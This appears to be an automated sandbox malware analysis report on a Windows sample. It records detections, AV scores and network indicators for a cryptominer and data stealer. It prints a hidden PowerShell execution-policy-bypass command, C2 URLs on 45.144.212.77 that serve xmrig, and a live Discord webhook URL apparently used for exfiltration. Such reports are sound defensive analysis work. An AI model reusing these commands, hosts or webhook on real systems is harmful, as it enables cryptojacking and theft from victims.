        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1652, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ProcessId: 7256, ProcessName: powershell.exe
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7420, ProcessName: svchost.exe

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7256, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", ProcessId: 7696, ProcessName: csc.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-03-01T16:04:22.801954+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49712 | 162.159.138.232 | 443 | TCP
        2025-03-01T16:04:25.053685+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49725 | 162.159.138.232 | 443 | TCP
        2025-03-01T16:04:57.084630+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49917 | 204.79.197.203 | 443 | TCP
        2025-03-01T16:04:41.499749+0100 | 2830898 | 1 | A Network Trojan was detected | 192.168.2.7 | 49820 | 108.128.124.3 | 443 | TCP
        2025-03-01T16:04:42.451553+0100 | 2830898 | 1 | A Network Trojan was detected | 192.168.2.7 | 49826 | 108.128.124.3 | 443 | TCP

        AV Detection

        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeReversingLabs: Detection: 42%
        Source: 1ZXaFij.exeVirustotal: Detection: 55%
        Source: 1ZXaFij.exeReversingLabs: Detection: 42%
        Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Bitcoin Miner

        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49917 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49976 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49988 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49989 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49993 version: TLS 1.2
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdbhPA source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdb source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdb source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdbhPA source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A24B0 FindFirstFileW,FindClose,FindFirstFileW,FindClose,2_2_00000001400A24B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400296C0 GetFileAttributesW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,2_2_00000001400296C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400709C0 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,2_2_00000001400709C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029170 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0000000140029170
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029520 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,2_2_0000000140029520
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140028E70 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,2_2_0000000140028E70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
        Source: C:\Windows\explorer.exeCode function: 4x nop then dec eax23_2_11F2BD80
        Source: C:\Windows\explorer.exeCode function: 4x nop then dec eax23_2_5833BD80

        Networking

        Source: Network trafficSuricata IDS: 2830898 - Severity 1 - ETPRO MALWARE Win32/TeleGrab Style IP Check : 192.168.2.7:49826 -> 108.128.124.3:443
        Source: Network trafficSuricata IDS: 2830898 - Severity 1 - ETPRO MALWARE Win32/TeleGrab Style IP Check : 192.168.2.7:49820 -> 108.128.124.3:443
        Source: C:\Windows\explorer.exeNetwork Connect: 45.144.212.77 16000
        Source: C:\Windows\explorer.exeNetwork Connect: 208.95.112.1 80
        Source: C:\Windows\explorer.exeNetwork Connect: 108.128.124.3 443
        Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49837
        Source: global trafficTCP traffic: 192.168.2.7:49700 -> 45.144.212.77:16000
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Disposition: attachment; filename*=UTF-8''xmrig.exeContent-Length: 6423040Content-Type: application/octet-streamLast-Modified: Thu, 13 Feb 2025 14:07:02 GMTSet-Cookie: t2kjedsto6t1tmx2hporygybel0ewazl9vn62y7wv23mxwm0n1aia0fiwn3i2tc2sam7k5s0urb02fx948z3bl4nl2h6bm1ib9h4lr4aklbjk8ei4qio6z5gwe45s1j1=c59195a1-8cfb-422b-b31e-ad65abe9773b; Path=/; Domain=45.144.212.77; Expires=Sun, 02 Mar 2025 15:04:34 GMT; Max-Age=86400; HttpOnly; SameSite=LaxDate: Sat, 01 Mar 2025 15:04:34 GMT
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Disposition: attachment; filename*=UTF-8''xmrig.exeContent-Length: 6423040Content-Type: application/octet-streamLast-Modified: Thu, 13 Feb 2025 14:07:02 GMTSet-Cookie: t2kjedsto6t1tmx2hporygybel0ewazl9vn62y7wv23mxwm0n1aia0fiwn3i2tc2sam7k5s0urb02fx948z3bl4nl2h6bm1ib9h4lr4aklbjk8ei4qio6z5gwe45s1j1=a567a7b2-c332-408c-a558-3e60dc9d0ee4; Path=/; Domain=45.144.212.77; Expires=Sun, 02 Mar 2025 15:04:43 GMT; Max-Age=86400; HttpOnly; SameSite=LaxDate: Sat, 01 Mar 2025 15:04:43 GMT
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=A832951E-6F73-4E67-8618-6335829FCBCB&user=m-87c0d7fd4110479b90e592644fef2efa HTTP/1.1Host: api.msn.com
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=510BBDB7-3599-436D-820F-2ABDE7F9F873&user=m-e7a31ade3d684c0e97c45c78160337e0 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2952DDCC-108A-4E23-AF85-28774DAFF838&user=m-916b169b80db4bcaa1daf96135f22620 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2FFE0440-7220-4EB4-8A34-B544478D19A2&user=m-0e31ef8bffd841ec982c5646be013e0e HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=8FE6B6FE-A76C-4FD2-8505-C47EF2E5C176&user=m-8914b0e0329445caa4090e2130a4ca07 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
        Source: Joe Sandbox ViewIP Address: 204.79.197.203 204.79.197.203
        Source: Joe Sandbox ViewASN Name: HPC-MVM-ASHU HPC-MVM-ASHU
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: checkip.amazonaws.com
        Source: unknownDNS query: name: ip-api.com
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49712 -> 162.159.138.232:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 162.159.138.232:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49917 -> 204.79.197.203:443
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqaly5RkRwMMGA9hPd0zvz0yH HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 79Host: discord.com
        Source: global trafficHTTP traffic detected: GET /setup HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 45.144.212.77:16000
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /xmrig HTTP/1.1Host: 45.144.212.77:16000User-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /line/8.46.123.189?fields=countryCode HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficDNS traffic detected: DNS query: discord.com
        Source: global trafficDNS traffic detected: DNS query: checkip.amazonaws.com
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: global trafficDNS traffic detected: DNS query: api.msn.com
        Source: unknownHTTP traffic detected: POST /api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqaly5RkRwMMGA9hPd0zvz0yH HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 79Host: discord.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Mar 2025 15:04:22 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1740841464x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LdVxsXtXuNT%2BpPSsoeCxbtxWYBFPJ%2F8JSqJqOv9WhUx0WcQX4Jv%2BdZn%2FeJ0fqA0MBYv30tvlDlAZU82o289YsciYVS%2BAdiqTtULQoH1AZUUHmwwU1YWeZN7N%2Flkb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7caf5529e9397845fe8c5c3bbc019ad19603bc50-1740841462; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneReporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Mar 2025 15:04:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1740841466x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBWF0YjFXDLy6SBiPs%2F1dI4iDh6fPWv%2FtuyHhw%2BxvtR6cvxDijX07W2ZkkWRLou5qpQ3G2nBrbcgjpMApHr40wQjirLgNDQLJZK%2BtGNxRIeJismZ5A8Pd5pCF4rS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6af3c8396a0443402b19cb89374ec0cca82a218d-1740841465; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneReporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
        Source: 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1365187542.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/
        Source: reg.exe, 0000000E.00000002.1388357406.000001C5FC600000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1511345993.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/client
        Source: 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/clientreg
        Source: runps.exe, 0000000C.00000002.1398553534.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/clientxq
        Source: 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000000.1384821654.000000014012F000.00000002.00000001.01000000.00000006.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/setup
        Source: 1ZXaFij.exe, 00000002.00000002.1375492399.00000000009F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/setup(
        Source: runps.exe, 0000000C.00000002.1398553534.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/setuphttp://45.144.212.77:16000/clientallen
        Source: 1ZXaFij.exe, 00000002.00000002.1375597639.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.144.212.77:16000/setuphttp://45.144.212.77:16000/clientttp://45.144.212.77:16000/setup:
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A5979000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000B.00000002.1627613856.00000222B7A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1485108514.00000203A5751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA01B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A5979000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000000B.00000002.1627613856.00000222B7A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1485108514.00000203A5751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: https://autohotkey.com
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: https://autohotkey.comCould
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: runps.exe, 0000000C.00000003.1398080911.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398847412.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/
        Source: runps.exe, 0000000C.00000002.1398553534.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397215330.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009BF000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqal
        Source: runps.exe, 0000000C.00000002.1398847412.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397448544.0000000000A30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discord.com:443/api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzR
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A5979000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000B.00000002.1627613856.00000222B8678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: runps.exe, 0000000C.00000002.1399090382.0000000002F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&se
        Source: runps.exe, 0000000C.00000003.1396996325.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1399090382.0000000002F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://o64374.ingest.sentry.io;
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA01B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA01B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknown | Network traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49917
        Source: unknown | Network traffic detected: HTTP traffic on port 49993 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49712 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49725 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49917 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49976 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49988 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49989 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49993 version: TLS 1.2
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400076D0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Code function: 2_2_00000001400A5120 EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard
